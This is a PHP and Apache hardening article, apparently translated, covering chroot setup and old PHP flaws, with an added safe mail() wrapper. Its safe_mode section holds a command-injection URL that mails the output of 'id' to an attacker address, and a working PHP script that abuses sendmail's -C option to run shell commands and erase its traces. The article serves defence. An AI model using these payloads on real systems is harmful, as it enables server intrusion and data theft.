I. Web Server Security
PHP actually runs as a module of the web server, so you must first make sure the web server itself is secure. Of course, securing the web server in turn requires securing the operating system; that is a long road with no end. PHP can be combined with many web servers; here we only discuss Apache. We strongly recommend installing and running Apache inside a chroot jail. That way, even if Apache, PHP, or their scripts turn out to have vulnerabilities, only the jailed environment is affected and the real system is not harmed. However, running Apache under chroot can cause some problems for applications. For example, when connecting to MySQL you must use the address 127.0.0.1 to get a TCP connection rather than localhost, which would use a Unix socket (the socket file lies outside the jail); this is slightly less efficient. The mail function is also a problem, because php.ini contains the following:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
Both settings apply only to the Win32 platform; on Unix, PHP hands mail to the sendmail binary, so sendmail must be adjusted to work inside the chroot environment.
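As an added example (not part of the original article), this is the php.ini mail section one would use for Apache running in a chroot jail on Unix. The path /usr/sbin/sendmail is assumed to be the location of sendmail inside the jail; the two Win32 settings are kept only for completeness and are ignored on Unix.

```ini
[mail function]
; Unix/Linux: PHP pipes outgoing mail to this program. The path is resolved
; inside the chroot, so the binary and everything it needs at run time
; (its configuration file, shared libraries, queue directory, /dev/null)
; must be copied into the jail or mail() will fail silently.
sendmail_path = "/usr/sbin/sendmail -t -i"

; Win32 only; these have no effect on Unix.
SMTP = localhost
sendmail_from = me@localhost.com
```

A quick check after setting this up is to call mail() from a small script inside the jail and confirm with `ls -la` that every file sendmail opens exists relative to the chroot root, not the host root.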
II. PHP Problems
1. Remote Overflow
All PHP versions below 4.1.2 have a remote buffer overflow in file-upload handling; exploit programs for it have circulated widely and succeed at a very high rate.
2. Remote Denial of Service
PHP 4.2.0 and 4.2.1 have a remote vulnerability in the handling of multipart/form-data POST requests that can cause a denial of service even without a local user account.
3. safe_mode Bypass Vulnerability
PHP versions from 4.0.5 up to (but below) 4.2.2 also have a vulnerability in which the mail() function can be used to bypass the safe_mode restriction and execute commands. Version 4.0.5 added a fifth parameter to mail(), and within weeks of its introduction it was found that this parameter could be used to break out of safe_mode. On 4.0.5 the bypass is very simple: separate with a semicolon and append a shell command. For example, suppose the PHP script evil.php exists:
Run the following URL:
http://foo.com/evil.php?bar=;/usr/bin/id | mail evil@domain.com
This mails the output of id to evil@domain.com.
For PHP 4.0.6 through 4.2.2, breaking the safe_mode restriction relies on sendmail's -C parameter (an alternative configuration file), so the target system must be using sendmail. The following code breaks through the safe_mode restriction and executes a command:
<?php
# Note: the following two files must not already exist, or their owner must be the same as the owner of the script:
$script = "/tmp/script123";
$cf = "/tmp/cf123";
# Write a minimal sendmail.cf that delivers "local" mail by running $script with /bin/sh
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
# The script removes its own traces and then runs $cmd
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf;");
fwrite($fd, $cmd);
fclose($fd);
# The fifth parameter is passed straight to sendmail's command line
mail("nobody", "", "", "", "-C $cf");
?>
If you are still running one of the problematic PHP versions above, upgrade to the latest version promptly to eliminate these basic security issues.
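Upgrading removes the bugs themselves, but the two mail() bypasses above share a pattern worth defending against in application code regardless of PHP version: caller-controlled data reaching either the recipient string or the fifth (sendmail command line) argument. The following wrapper is an added example and is not code from the original article; the function names, the fixed From: address and the sample inputs are assumptions.

```php
<?php
// Added example: a wrapper around mail() that rejects the inputs the
// safe_mode bypasses relied on and never forwards the fifth argument.

/**
 * Return null if $to is acceptable, otherwise a short reason.
 * Only a single well-formed address is allowed; a value such as
 * ";/usr/bin/id | mail ..." contains ';', '|' and spaces and therefore
 * fails FILTER_VALIDATE_EMAIL, as does anything with CR/LF in it.
 */
function check_recipient(string $to): ?string
{
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return 'recipient is not a single valid address';
    }
    return null;
}

/**
 * Header values must not contain CR or LF: a line break would let the
 * caller append arbitrary headers (Bcc:, extra To:) to the message.
 */
function check_header_value(string $value): ?string
{
    if (preg_match('/[\r\n]/', $value)) {
        return 'header value contains a line break';
    }
    return null;
}

function safe_send_mail(string $to, string $subject, string $body, array $extraHeaders = []): bool
{
    if (check_recipient($to) !== null || check_header_value($subject) !== null) {
        return false;
    }
    // Only an allow-list of header names (assumed for this example), each with a clean value.
    $allowedHeaders = ['Reply-To', 'X-Request-Id'];
    foreach ($extraHeaders as $name => $value) {
        if (!in_array($name, $allowedHeaders, true) || check_header_value((string) $value) !== null) {
            return false;
        }
    }
    // The sender is a constant, never caller data, so no "-f" option is needed.
    $headers = ['From: noreply@example.invalid'];
    foreach ($extraHeaders as $name => $value) {
        $headers[] = "$name: $value";
    }
    // mail()'s fifth argument (additional_parameters) is passed to the
    // sendmail command line. It is deliberately never supplied here, so
    // nothing from the request can reach sendmail's -C or -O options.
    return mail($to, $subject, $body, implode("\r\n", $headers));
}

// Constructed sample inputs showing what the recipient check accepts and rejects.
$samples = [
    'user@example.com',                            // accepted
    ';/usr/bin/id | mail evil@domain.com',         // rejected: shell metacharacters
    "user@example.com\r\nBcc: other@example.com",  // rejected: header injection
];
foreach ($samples as $s) {
    printf("%-48s -> %s\n", addcslashes($s, "\r\n"), check_recipient($s) ?? 'ok');
}
```

The key design choice is structural rather than a filter: because the wrapper's signature has no place for additional_parameters, a code review only has to confirm that scripts call safe_send_mail() rather than mail() directly. On later PHP releases the php.ini directive mail.force_extra_parameters can additionally pin the sendmail options system-wide, overriding whatever a script passes as the fifth argument.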